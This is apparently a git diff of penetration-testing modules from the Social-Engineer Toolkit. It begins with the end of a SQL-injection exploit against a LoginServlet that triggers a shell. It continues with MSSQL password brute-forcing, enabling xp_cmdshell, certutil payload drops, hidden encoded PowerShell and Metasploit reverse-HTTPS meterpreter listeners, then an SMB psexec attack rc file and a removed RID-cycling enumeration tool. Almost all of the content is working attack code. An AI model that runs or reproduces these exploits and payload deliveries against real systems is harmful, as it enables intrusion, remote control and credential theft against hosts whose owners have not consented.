postpayload = "1' or 1=1#--"
loginstate = 'checkLogin'
password = 'OHAI'
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
post_params = urllib.parse.urlencode(
{'loginState': loginstate, 'loginName': prepayload, 'password': password})
cj = CookieJar()
opener = build_opener(HTTPCookieProcessor(cj))
post_params = urlencode({'loginState': loginstate, 'loginName': prepayload, 'password': password})
print("[*] Sending evil payload")
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
print("[*] Triggering shell")
post_params = urllib.parse.urlencode(
{'loginState': loginstate, 'loginName': postpayload, 'password': password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s" % (rhost, filename))
print("[*] Check your shell on %s %s\n" % (lhost, lport))
post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
opener.open("http://{0}:9000/{1}".format(rhost, filename))
print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100

461
src/fasttrack/mssql.py
View file

@ -1,24 +1,31 @@
#!/usr/bin/env python
from src.core.setcore import *
import sys
import subprocess
import socket
import re
import os
import time
import binascii
import base64
import shutil
# coding=utf-8
import _mssql
import binascii
import os
import shutil
import subprocess
import time
import src.core.setcore as core
import src.core.tds as tds
from src.core.payloadgen import create_payloads
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
#
# this is the mssql modules
#
# define the base path
definepath = definepath()
operating_system = check_os()
msf_path = meta_path()
definepath = core.definepath()
operating_system = core.check_os()
msf_path = core.meta_path()
#
# this is the brute forcer
@ -27,234 +34,264 @@ def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = open(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr, port = ipaddr
ipaddr = str(ipaddr)
port = str(port)
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
successful_password = None
with open(wordlist) as passwordlist:
for password in passwordlist:
password = password.rstrip()
# try actual password
try:
# connect to the sql server and attempt a password
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
ipaddr = str(ipaddr)
port = str(port)
print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
" with username of {bold}{username}{endc}"
" and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
username=username,
passwords=password,
port=port,
bold=core.bcolors.BOLD,
endc=core.bcolors.ENDC))
print("Attempting to brute force " + bcolors.BOLD + ipaddr + ":" + port + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC)
# connect to the sql server and attempt a password
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
password))
counter = 1
successful_password = password
break
# if login failed or unavailable server
except Exception as e:
except:
pass
# if we brute forced a machine
if counter == 1:
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr = ipaddr[0]
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
print_warning("Unable to guess the SQL password for %s with username of %s" % (
ipaddr, username))
return False
# if we brute forced a machine
if counter == 1:
return ",".join([ipaddr, username, port, successful_password])
# else we didnt and we need to return a false
else:
if ipaddr:
core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
choice1 = "1"
option = None
conn = _mssql.connect(ipaddr + ":" + str(port), username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;GO;RECONFIGURE;GO;exec master.dbo.sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO")
except: pass
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary""")
choice = raw_input("Enter your choice:\n\n1.) Use PowerShell Injection (recommended)\n2.) Use Certutil binary conversion\n\nEnter your choice [1]:")
if choice == "": choice = "1"
if choice == "1":
print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
print_status("Powershell delivery selected. Boom!")
else:
print("""Pick which deployment method to use. The first is PowerShell
and should be used on any modern operating system. The second method
will use the certutil method to convert a binary to a binary""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print err
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
print_status("You can either select to use a default Metasploit payload here or import your own in order to deliver to the system. Note that if you select your own, you will need to create your own listener at the end in order to capture this.")
choice1 = raw_input("\n\n1.) Use Metasploit (default)\n2.) Select your own\n\nEnter your choice[1]:")
if choice1 == "": choice1 = "1"
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("File not found! Try again.")
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
try:
module_reload(src.core.payloadgen.create_payloads)
core.module_reload(create_payloads)
except:
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
web_path = os.path.join(core.setdir, "web_clone")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path, "1msf.exe")
if choice1 == "1":
fileopen = open("%s/1msf.exe" % (web_path), "rb")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = open(setdir + "/payload.hex", "w")
filewrite.write(data)
filewrite.close()
with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if not os.path.isfile(os.path.join(core.setdir, "set.payload")):
if operating_system == "posix":
try:
module_reload(pexpect)
core.module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "meta_config")))
# random executable name
random_exe = generate_random_string(10, 15)
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status(
"Using universal powershell x86 process downgrade attack..")
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https" + " " + port + ",")
filewrite.close()
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
try:
module_reload(src.payloads.powershell.prep)
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_https\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = meta_path()
msf_path = core.meta_path()
if operating_system == "posix":
try:
module_reload(pexpect)
core.module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir))
print_status(
"Waiting for the listener to start first before we continue forward...")
print_status(
"Be patient, Metaploit takes a little bit to start...")
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate..")
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
@ -267,31 +304,33 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2":
# here we start the conversion and execute the payload
print_status("Sending the main payload via to be converted back to a binary.")
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = open(setdir + "/payload.hex", "r")
print_status("Dropping inital begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > %s.crt'" % (random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "":
break
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
conn.execute_query("exec master..xp_cmdshell 'echo %s >> %s.crt'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
print_status("Dropping end header for binary format converstion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> %s.crt'" % (random_exe))
print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode %s.crt %s.exe'" % (random_exe, random_exe))
print_status("Executing the payload - magic has happened and now its time for that moment.. You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '%s.exe'" % (random_exe))
with open(os.path.join(core.setdir, 'payload.hex')) as fileopen:
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
for data in fileopen.read(900).rstrip():
if not data:
continue
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath)
except:
pass
@ -299,42 +338,43 @@ def deploy_hex2binary(ipaddr, port, username, password):
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
module_reload(thread)
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(setdir + "meterpreter.alpha"):
alphainject = fileopen(setdir + "meterpreter.alpha", "r").read()
if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")):
with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '%s.exe %s'" % (random_exe, alphainject))
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
@ -352,27 +392,30 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
import src.core.tds as tds
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
core.print_status("Connection established with SQL Server...")
core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;"
"RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"RECONFIGURE;")
except:
pass
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
core.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while True:
# prompt mssql
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
if cmd != "":
elif cmd:
# execute the command
mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd))
mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80 * 2

111
src/fasttrack/psexec.py
View file

@ -1,9 +1,20 @@
# coding=utf-8
#############################################
#
# Main SET module for psexec
#
#############################################
from src.core.setcore import *
import os
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# Module options (auxiliary/admin/smb/psexec_command):
@ -17,28 +28,24 @@ from src.core.setcore import *
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the
# remote Windows directory
# WINPATH WINDOWS yes The name of the remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = check_config("STAGE_ENCODING=").lower()
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts = input(setprompt(
["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
rhosts = input(core.setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(setprompt(["32"], "Enter the username"))
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(setprompt(["32"], "Enter the password or the hash"))
domain = input(setprompt(
["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(
setprompt(["32"], "How many threads do you want [enter for default]"))
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(core.setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
domain = "WORKGROUP"
@ -46,7 +53,7 @@ if domain == "":
if threads == "":
threads = "15"
payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
#
# payload generation for powershell injection
@ -54,50 +61,62 @@ payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
try:
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = input(setprompt(["29"], "Enter the port for the reverse [443]"))
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write(payload + " " + port + ",")
filewrite.close()
update_options("POWERSHELL_SOLO=ON")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
try:
module_reload(src.payloads.powershell.prep)
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86)
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_https\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" %
(port, rhosts, username, password, domain, threads, command, stage_encoding))
filewrite.close()
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"
"exploit -j\n"
"use auxiliary/admin/smb/psexec_command\n"
"set RHOSTS {1}\n"
"set SMBUser {2}\n"
"set SMBPass {3}\n"
"set SMBDomain {4}\n"
"set THREADS {5}\n"
"set COMMAND {6}\n"
"set EnableStageEncoding {7}\n"
"set ExitOnSession false\n"
"exploit\n".format(port, rhosts, username, password, domain, threads, command, stage_encoding))
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(meta_path(), setdir), shell=True).wait()
core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")),
shell=True).wait()
# handle exceptions
except Exception as e:
print_error("Something went wrong printing error: " + str(e))
core.print_error("Something went wrong printing error: {0}".format(e))

396
src/fasttrack/rid_enum.py
View file

@ -1,396 +0,0 @@
#!/usr/bin/python
import subprocess
import os
import sys
##########################################################################
#
# RID Enum
# RID Cycling Tool
#
# Written by: David Kennedy (ReL1K)
# Website: https://www.trustedsec.com
# Twitter: @TrustedSec
# Twitter: @HackingDave
#
# This tool will use rpcclient to cycle through and identify what rid accounts exist. Uses a few
# different techniques to find the proper RID.
#
# Special thanks to Tom Steele for the pull request update and changes.
#
##########################################################################
def usage():
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
Written by: David Kennedy (ReL1K)
Company: https://www.trustedsec.com
Twitter: @TrustedSec
Twitter: @HackingDave
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
automatically attempt to brute force the user accounts when its finished enumerating.
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if "NT_STATUS_NONE_MAPPED" or "NT_STATUS_CONNECTION_REFUSED" or "NT_STATUS_ACCESS_DENIED" in stdout_value:
return False
else:
return stdout_value
# helper function to break a list up into smaller lists
def chunk(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
# this will do a conversion to find the account name based on rid
# looks up multiple sid-rids at a time provided a range
def sids_to_names(ip, sid, start, stop):
rid_accounts = []
ranges = ['%s-%s' % (sid, rid) for rid in range(start, stop)]
# different chunk size for darwin (os x)
chunk_size = 2500
if sys.platform == 'darwin':
chunk_size = 5000
chunks = list(chunk(ranges, chunk_size))
for c in chunks:
command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
command += ' '.join(c)
command += '"'
proc = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if "NT_STATUS_ACCESS_DENIED" in stdout_value:
print("[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.")
global denied
denied = 1
break
for line in stdout_value.rstrip().split('\n'):
if not "*unknown*" in line:
if line != "":
rid_account = line.split(" ", 1)[1]
# will show during an unhandled request
# '00000' are bogus accounts?
# only return accounts ie. (1). Everything else should be a
# group
if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
# here we join based on spaces, for example 'Domain
# Admins' needs to be joined
rid_account = rid_account.replace("(1)", "")
# return the full domain\username
rid_account = rid_account.rstrip()
rid_accounts.append(rid_account)
return rid_accounts
# capture initial input
success = False
try:
if len(sys.argv) < 4:
usage()
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
# if we use userlist
userlist = ""
if len(sys.argv) > 4:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
